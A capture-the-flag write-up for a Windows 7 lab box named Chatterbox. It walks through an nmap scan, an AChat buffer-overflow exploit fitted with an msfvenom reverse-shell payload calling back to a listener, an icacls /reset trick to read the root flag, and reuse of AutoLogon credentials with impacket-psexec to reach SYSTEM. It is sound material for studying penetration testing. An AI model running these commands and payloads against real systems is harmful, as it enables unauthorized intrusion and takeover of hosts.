Recon
nmap
```
└─$ nmap -T5 -A -sV -p- -Pn 10.10.10.74
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-10 16:01 CEST
Warning: 10.10.10.74 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.74
Host is up (0.041s latency).
Not shown: 65431 closed tcp ports (conn-refused), 93 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  http         AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp  open  achat        AChat chat system
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h20m00s, deviation: 2h18m34s, median: 4h59m59s
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-09-10T19:03:31
|_  start_date: 2022-09-10T18:59:34
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Chatterbox
|   NetBIOS computer name: CHATTERBOX\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-09-10T15:03:27-04:00
```
We are facing a Windows 7 Professional SP1 box (build 7601, hostname CHATTERBOX) in a workgroup, with SMB signing not required (useful for NTLM relay, but not needed here). The unusual services are on ports 9255 (an HTTP server identifying itself as the AChat httpd) and 9256 (the AChat chat service). Note the retransmission warning: -T5 is aggressive enough to drop probes, so if results look incomplete, re-run the scan at -T4. A request to the HTTP port returns nothing at all:
```
└─$ curl http://10.10.10.74:9255/
# no output
```
dirbuster
Running dirbuster against port 9255 does not turn up any files or directories either.
Vulnerabilities
The only lead we have is the AChat chat system running on port 9256 (with its HTTP component on 9255). Searching searchsploit shows that this service is vulnerable to a remote buffer overflow, with both a standalone Python exploit and a Metasploit module available.
```
└─$ searchsploit AChat
-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow              | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | windows/remote/36056.rb
-------------------------------------------------------- ---------------------------------
```
I tried the Python exploit. Its stock payload is only a proof of concept (it pops calc.exe), so we first have to replace it with a reverse shell. We can craft the payload with msfvenom, keeping the exploit's own encoder settings: the overflow is a Unicode one (the input is widened to UTF-16 before it lands on the stack), so the shellcode is encoded with x86/unicode_mixed, every byte outside 7-bit ASCII plus the null byte is declared bad, and BufferRegister=EAX tells the encoder which register points at the payload when it starts executing. The encoded shellcode must also still fit in the space the exploit has for it, so check its size against the exploit's limit before sending.
```
# create a reverse shell payload
└─$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.16.11 lport=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

# modify exploit.py target address & payload (the exploit talks to AChat over UDP)
# sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# server_address = ('10.10.10.74', 9256)

# start the listener, then execute the exploit
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.74] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\alfred

C:\Users\Alfred>type Desktop\user.txt
type Desktop\user.txt
*************************ea80cce
```
We get a shell as chatterbox\alfred and can read the user flag.
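Before wiring the msfvenom output into the exploit it is worth checking two things offline: that no bad character slipped through the encoder, and what the payload looks like once the server widens it to UTF-16. The Python below is an added example written for this writeup; it is not code from the original post or from the public AChat exploit. The `buf` lines it parses are a constructed sample in the shape `msfvenom -f python` prints (not real shellcode), and `max_len`, the number of raw bytes the exploit can carry, is an assumption the caller must take from the exploit being used.

```python
"""Offline checks for a Unicode-safe buffer-overflow payload.

Added example; not code from the writeup or from the AChat exploit.
The encoder choice on the page (x86/unicode_mixed, bad chars 0x00 and
0x80-0xff) only makes sense because the server widens the attacker's
7-bit input to UTF-16LE before it reaches the stack.  These helpers
(a) reassemble `msfvenom -f python` output, (b) confirm it contains no
bad character, and (c) model the widening so you can see what lands in
memory.
"""
import re

# Bad characters taken from the msfvenom command in the writeup:
# NUL plus every byte outside 7-bit ASCII.
BADCHARS = b"\x00" + bytes(range(0x80, 0x100))

# Constructed sample in the shape `msfvenom -f python` prints.
# Not real shellcode: just a `buf` variable holding 20 ASCII-range bytes.
SAMPLE_MSFVENOM_OUTPUT = r'''buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
'''

_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_msfvenom_python(text: str) -> bytes:
    """Rebuild the byte string from the `buf += b"..."` lines of -f python output."""
    out = bytearray()
    for line in text.splitlines():
        if line.startswith("buf"):
            out += bytes(int(h, 16) for h in _HEX.findall(line))
    return bytes(out)


def find_badchars(shellcode: bytes, badchars: bytes = BADCHARS) -> list:
    """Return (offset, byte) for every forbidden byte found in the shellcode."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def widen_to_utf16le(payload: bytes) -> bytes:
    """Model the ASCII -> UTF-16LE widening: each 7-bit byte becomes <byte> 0x00.

    Bytes >= 0x80 are refused: their widened form depends on the target's
    ANSI code page, which is exactly why the exploit declares them bad."""
    if find_badchars(payload, bytes(range(0x80, 0x100))):
        raise ValueError("non-ASCII byte: widened form is code-page dependent")
    return payload.decode("ascii").encode("utf-16-le")


def check_payload(text: str, max_len: int) -> dict:
    """One-stop check before pasting the shellcode into the exploit.

    max_len is the number of raw bytes the exploit can carry; it is
    exploit-specific and assumed to be supplied by the caller."""
    shellcode = parse_msfvenom_python(text)
    bad = find_badchars(shellcode)
    widened = widen_to_utf16le(shellcode) if not bad else b""
    return {
        "raw_len": len(shellcode),
        "bad": bad,                       # empty list means the encoder did its job
        "widened_len": len(widened),      # what actually occupies the stack
        "fits": not bad and len(shellcode) <= max_len,
    }


if __name__ == "__main__":
    # Assumed limit of 64 raw bytes for the constructed sample.
    print(check_payload(SAMPLE_MSFVENOM_OUTPUT, max_len=64))
```

Run it on the real msfvenom output by pasting the generated `buf` lines into `SAMPLE_MSFVENOM_OUTPUT` (or reading them from a file) and passing the exploit's actual payload limit as `max_len`; a non-empty `bad` list means the bad-character list given to msfvenom was incomplete.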
Path to the privesc
Local recon
The Alfred user has full access to the Administrator's home directory, yet reading root.txt is denied:
```
C:\>cd Users\Administrator\Desktop
cd Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.
```
I first looked into the file permissions. On Windows, icacls is the rough equivalent of chmod (or rather getfacl/setfacl) on Unix: it displays and modifies a file's access control list. Running icacls on the file without options only lists the ACL; the /reset switch discards every explicit ACE and re-applies the ACEs inherited from the parent directory. Since Alfred already has access to the Desktop directory, resetting root.txt should make it inherit that access. This only succeeds because Alfred is allowed to rewrite the file's DACL in the first place (a file's owner can always do so, as can anyone holding the WRITE_DAC right); on a real engagement, list the ACL first and note or save it, since /reset is destructive. I tried it and...
```
C:\Users\Administrator\Desktop>icacls root.txt /reset
icacls root.txt /reset
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop>type root.txt
type root.txt
**************************b1a8b4
```
We can now read the root flag.
The real privesc
We can read the flag, but we still have no proper SYSTEM shell. So I ran winPEAS to look for anything interesting, and it flagged AutoLogon credentials:
```
#### Looking for AutoLogon credentials
Some AutoLogon credentials were found
    DefaultUserName               :  Alfred
    DefaultPassword               :  Welcome1!
```
We found AutoLogon credentials. AutoLogon is a Windows feature that signs a chosen account in automatically at boot; the account name and password are stored under the Winlogon registry key (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, values DefaultUserName and DefaultPassword), in clear text unless the password was placed in an LSA secret. HKLM is readable by ordinary users, which is why a low-privileged shell can recover it (winPEAS just reads that key; reg query works as well). The password belongs to Alfred, the account we already have, but passwords tend to be reused, so I tried it against the local Administrator account with impacket-psexec.
```
└─$ impacket-psexec Administrator@10.10.10.74
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.74.....
[*] Found writable share ADMIN$
[*] Uploading file kqgJRiXp.exe
[*] Opening SVCManager on 10.10.10.74.....
[*] Creating service yJec on 10.10.10.74.....
[*] Starting service yJec.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```
We are now connected as nt authority\system. The password was indeed reused for Administrator: psexec needs an account that can write to ADMIN$ and talk to the Service Control Manager, so the writable ADMIN$ share was the first sign the credentials were administrative. Note that this technique is noisy, since it drops a binary into ADMIN$ and creates and starts a service, both of which leave event-log and on-disk artefacts.
Easy, External, Network, AChat, CVE Exploitation, CVE-2015-1578, Public Vulnerabilities, Weak Credentials, CVE-2015-1577, Information Disclosure, Password Reuse